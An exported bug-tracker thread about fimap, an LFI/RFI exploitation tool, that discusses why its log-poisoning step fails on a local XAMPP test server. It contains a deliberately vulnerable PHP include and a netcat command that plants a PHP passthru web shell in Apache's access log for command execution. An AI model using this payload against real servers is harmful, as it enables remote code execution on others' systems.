Cannot exploit simple inclusion

[GoogleCodeExporter]

After adding new access_log entry into config/general.xml:

<file path="/opt/lampp/logs/access_log" find='"GET /' flags="LHx" unix="1" 
windows="0" />

LFI is found for lfi.php:

<?php require($_GET['file']); ?>

When trying to exploit it:

./fimap.py -x
fimap v.08.1 by Iman Karim - Automatic LFI/RFI scanner and exploiter
[INFO] 0 plugins loaded.
###########################
#:: List of Domains ::    #
###########################
#[1] localhost            #
#[q] Quit                 #
###########################
Choose Domain: 1
################################################################################
###############################
#:: FI Bugs on 'localhost' ::                                                   
                              #
################################################################################
###############################
#[1] URL: '/victim/lfi.php?file=test' injecting file: 
'/opt/lampp/logs/access_log' using GET-param: 'file'    #
#[q] Quit                                                                       
                              #
################################################################################
###############################
Choose vulnerable script: 1
[INFO] Testing PHP-code injection thru Logfile HTTP-UA-Injection...
[INFO] Testing if log kickstarter is present...
[INFO] Kickstarter is not present. Injecting kickstarter...
[INFO] Testing once again if kickstarter is present...
[ERROR] Failed to inject kickstarter!

Original issue reported on code.google.com by msen...@gmail.com on 8 Feb 2011 at 9:17

[GoogleCodeExporter]

Hello!

Have you tried to increase the TTL? Sometimes it takes ages to download the 
Logfile.
Also it could be that in the Logfile itself there is some syntax error which 
basicly doesn't let the exploit to be launched.

What you can try is:
- Increase TTL.
- Try it someday when you think the log will rotate (1. March?).
- Try it manually and if you had success let me know what you have done.

Thanks!
-imax.

Original comment by fimap....@gmail.com on 10 Feb 2011 at 4:22

• Changed state: Accepted
• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

Hi,

manually it works without any problems:

echo -e 'GET /lfi.php?file=<?php passthru($_GET['cmd']); ?>
HTTP1/1\nHost: http://localhost/victim/\n\n' | netcat localhost 80

This gets it into access_log file, then i can normally include it and
execute commands. It is a fresh XAMPP localhost installation, clean
access logs - so no syntax errors.

fimap -x fails with "Failed to inject kickstarter".

Milan

Original comment by msen...@gmail.com on 10 Feb 2011 at 1:51

• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

Hello again Milan,

OK good to know.
I am going to take a look at it this weekend.
Please give me any information you think is important for this.
You can also send me an email: fimap.dev @ gmail.com

Thanks dude,
-imax.

Original comment by fimap....@gmail.com on 10 Feb 2011 at 5:04

• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

Hi :)

Sure, the simple source file is attached, XAMPP 1.7.4 (latest) on Linux,
standard installation.
Added the line to support access logs under /opt/lampp/logs, where XAMPP
puts them.
Im also attaching u my list of locations where I would go look for logs
for Apache, if u want feel free
to include them.

I just run it ./fimap -u http://localhost/lfi.php?file=test

It finds the vulnerable log file.

./fimap -x, select localhost, then it fails. php://input, if I allow
allow_url_access (or how is it called in php.ini) works.

Tried latest downloaded version and also svn, same issue.

Im writting a thesis about web hacking and i would like to use ur tool
to demonstrate how to automate the whole
process of looking for lfi/rfi :)

Have a nice weekend!

Milan

Original comment by msen...@gmail.com on 10 Feb 2011 at 7:20

• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

Hey again, :)

The problem was that fimap only tries to inject the LogKickstarter thru 
UserAgent.
Some servers obviously don't log the UserAgent. For that case I have added 
another attemp to inject the Kickstarter. This method is trying to inject it 
thru the path like this: http://localhost/exploit.py?<?php doLegalPentest(); ?>

Will be pushed to SVN in a few hours.

Thanks man!
-imax

Original comment by fimap....@gmail.com on 13 Feb 2011 at 3:15

• Changed state: Fixed
• Added labels: ****
• Removed labels: ****